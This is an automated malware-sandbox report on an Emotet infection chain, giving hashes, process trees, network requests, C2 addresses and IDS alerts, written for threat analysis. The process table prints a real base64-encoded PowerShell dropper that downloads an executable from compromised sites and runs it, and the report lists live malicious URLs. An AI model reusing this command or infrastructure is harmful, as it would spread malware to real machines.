analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://sportsgamesandapps.com/wp-admin/paclm/nsRsTnVrEAMjXIrqJITrYdRGdsFu/

Full analysis: https://app.any.run/tasks/b3859823-d0d1-47fc-ab97-1d789a997657
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 24, 2019, 20:07:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
emotet
emotet-doc
Indicators:
MD5:

403ADA5E1465BC16BB19A348CAA5946B

SHA1:

596E9BD7315D363005F213C81F6FC3DD60073132

SHA256:

3EBD9EF06285BBC5DB32D1BA08B3A908FA11F63E8872D4A33A2CEAA6ABEAF161

SSDEEP:

3:N1KNVD8adiVgoaLNQYyinK:CvdiVghJjy+K

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 585.exe (PID: 1648)
      • 585.exe (PID: 3664)
      • soundser.exe (PID: 1712)
      • soundser.exe (PID: 4004)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1868)
    • Emotet process was detected

      • soundser.exe (PID: 1712)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • chrome.exe (PID: 2152)
      • WINWORD.EXE (PID: 408)
    • Executed via WMI

      • powershell.exe (PID: 1868)
    • Application launched itself

      • WINWORD.EXE (PID: 408)
      • 585.exe (PID: 1648)
      • soundser.exe (PID: 1712)
    • PowerShell script executed

      • powershell.exe (PID: 1868)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1868)
      • 585.exe (PID: 3664)
    • Starts itself from another location

      • 585.exe (PID: 3664)
    • Creates files in the user directory

      • powershell.exe (PID: 1868)
    • Connects to server without host name

      • soundser.exe (PID: 4004)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 408)
      • WINWORD.EXE (PID: 2684)
    • Reads Internet Cache Settings

      • chrome.exe (PID: 2152)
    • Reads settings of System Certificates

      • chrome.exe (PID: 2152)
    • Application launched itself

      • chrome.exe (PID: 2152)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 408)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
16
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs powershell.exe chrome.exe no specs 585.exe no specs 585.exe #EMOTET soundser.exe no specs soundser.exe chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2152"C:\Program Files\Google\Chrome\Application\chrome.exe" http://sportsgamesandapps.com/wp-admin/paclm/nsRsTnVrEAMjXIrqJITrYdRGdsFu/C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
3100"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=73.0.3683.75 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6e870f18,0x6e870f28,0x6e870f34C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
2188"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2160 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
4056"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=936,8762393884207693023,14957799735049361729,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=66203899630775436 --mojo-platform-channel-handle=956 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
2816"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=936,8762393884207693023,14957799735049361729,131072 --enable-features=PasswordImport --service-pipe-token=15540309883557182829 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15540309883557182829 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2036 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
3932"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=936,8762393884207693023,14957799735049361729,131072 --enable-features=PasswordImport --service-pipe-token=6540198023234917099 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=6540198023234917099 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
3156"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=936,8762393884207693023,14957799735049361729,131072 --enable-features=PasswordImport --service-pipe-token=10391253757976413120 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=10391253757976413120 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2244 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
408"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\LLC_734725830143US_May_24_2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2684"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1868powershell -nop -e JAB0ADYAdwA0AHUAbwA9ACcAdwA2ADAATQB0AG8AbABFACcAOwAkAEYAegBiAFIAUABhAE4AegAgAD0AIAAnADUAOAA1ACcAOwAkAG4AQwBKAF8AXwAwAD0AJwBaADgAdwBzADQAbwBMAEIAJwA7ACQARwBoAHAAQwA2AFoAbwBKAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABGAHoAYgBSAFAAYQBOAHoAKwAnAC4AZQB4AGUAJwA7ACQAbwBTAFEAXwA3AE4AZgAwAD0AJwBwAHIATAAyAF8AbQAnADsAJABHADEAbwBCAEgAaQB0AGwAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQB0AC4AYAB3AEUAYgBDAGAATABJAGUAYABOAFQAOwAkAEQASwByAFQAWgA3AD0AJwBoAHQAdABwADoALwAvAGEAZABhAGMAYQBuAC4AbgBlAHQALwBjAGcAaQAtAGIAaQBuAC8AQQByAFEAbABZAFcAVABHAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AYwB6AGEAYgBrAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBFAGQAUQBkAG8ARwBuAGIAQgB6AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AcgBpAC0AbQBhAGcAYQB6AGkAbgBlAC4AYwBvAG0ALwByAGkALwB1AHMAbwBkADcAaQBuAGwAYwAzAF8AYQA4AGIAbwBsAHQALQAzADUALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAGgAYQBuAGcALQBkAGkAbgBnAC4AYwBvAG0ALgB0AHcALwBwAGgAcABtAHkAYQBkAG0AaQBuAC8AegBlADIANAB5AHYAdgBvAG0AXwB0AGsAZABwAG0AbAAzADQAdwAtADUANgAwADQAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAYQBmAGEALgBwAHgAbABjAG8AcgBwAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB4AEUAVgBLAGUAeQBHAFMALwAnAC4AcwBwAGwASQBUACgAJwBAACcAKQA7ACQAbAA3AHcANQA4ADQAPQAnAEkATQBGAGoAaABtAFgAVAAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB2AE0ATQA3AHAAegAgAGkAbgAgACQARABLAHIAVABaADcAKQB7AHQAcgB5AHsAJABHADEAbwBCAEgAaQB0AGwALgBEAE8AVwBOAEwAbwBBAEQAZgBJAGwARQAoACQASwB2AE0ATQA3AHAAegAsACAAJABHAGgAcABDADYAWgBvAEoAKQA7ACQAdgB3AEgAOABpAEIARQB1AD0AJwBuADcAdABRAE4AQQBTAFIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABHAGgAcABDADYAWgBvAEoAKQAuAEwARQBOAGcAdABoACAALQBnAGUAIAAzADkANwA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAVABhAHIAVAAoACQARwBoAHAAQwA2AFoAbwBKACkAOwAkAFQARABJAEQAVAA0AFcAPQAnAFAANABDAEUAcwBwACcAOwBiAHIAZQBhAGsAOwAkAFgAdgAxAE0ANQBJAEIATgA9ACcAUgBoAFQARgBUADYAagBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHQASwBJAHMATQB6AGYANAA9ACcAYwBqADgAagAxAE8ARAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 453
Read events
2 901
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
45
Unknown types
14

Dropped files

PID
Process
Filename
Type
2152chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
MD5:
SHA256:
2152chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
MD5:
SHA256:
2152chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
MD5:
SHA256:
2152chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
MD5:
SHA256:
2152chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
MD5:
SHA256:
2152chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\f83d95c4-d131-4416-aa73-a5e425c33f4d.tmp
MD5:
SHA256:
2152chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000018.dbtmp
MD5:
SHA256:
2152chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index
MD5:
SHA256:
2152chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0
MD5:
SHA256:
2152chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
10
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2152
chrome.exe
GET
200
104.238.111.143:80
http://sportsgamesandapps.com/wp-admin/paclm/nsRsTnVrEAMjXIrqJITrYdRGdsFu/
US
document
123 Kb
suspicious
1868
powershell.exe
GET
200
31.186.8.88:80
http://adacan.net/cgi-bin/ArQlYWTG/
TR
executable
164 Kb
suspicious
4004
soundser.exe
POST
5.67.205.99:80
http://5.67.205.99/codec/
GB
malicious
4004
soundser.exe
POST
76.86.20.103:80
http://76.86.20.103/arizona/window/ringin/merge/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
104.238.111.143:80
sportsgamesandapps.com
GoDaddy.com, LLC
US
suspicious
4004
soundser.exe
5.67.205.99:80
Sky UK Limited
GB
malicious
2152
chrome.exe
172.217.21.205:443
accounts.google.com
Google Inc.
US
whitelisted
1868
powershell.exe
31.186.8.88:80
adacan.net
SAGLAYICI Teknoloji Bilisim Yayincilik Hiz. Ticaret Ltd. Sti.
TR
suspicious
2152
chrome.exe
104.238.111.143:80
sportsgamesandapps.com
GoDaddy.com, LLC
US
suspicious
2152
chrome.exe
172.217.21.227:443
ssl.gstatic.com
Google Inc.
US
whitelisted
2152
chrome.exe
172.217.23.132:443
www.google.com
Google Inc.
US
whitelisted
4004
soundser.exe
76.86.20.103:80
Time Warner Cable Internet LLC
US
malicious
2152
chrome.exe
216.58.207.67:443
clientservices.googleapis.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
sportsgamesandapps.com
  • 104.238.111.143
suspicious
clientservices.googleapis.com
  • 216.58.207.67
whitelisted
accounts.google.com
  • 172.217.21.205
shared
www.google.com
  • 172.217.23.132
whitelisted
ssl.gstatic.com
  • 172.217.21.227
whitelisted
adacan.net
  • 31.186.8.88
suspicious

Threats

PID
Process
Class
Message
2152
chrome.exe
Potential Corporate Privacy Violation
ET POLICY Office Document Download Containing AutoOpen Macro
1868
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1868
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1868
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info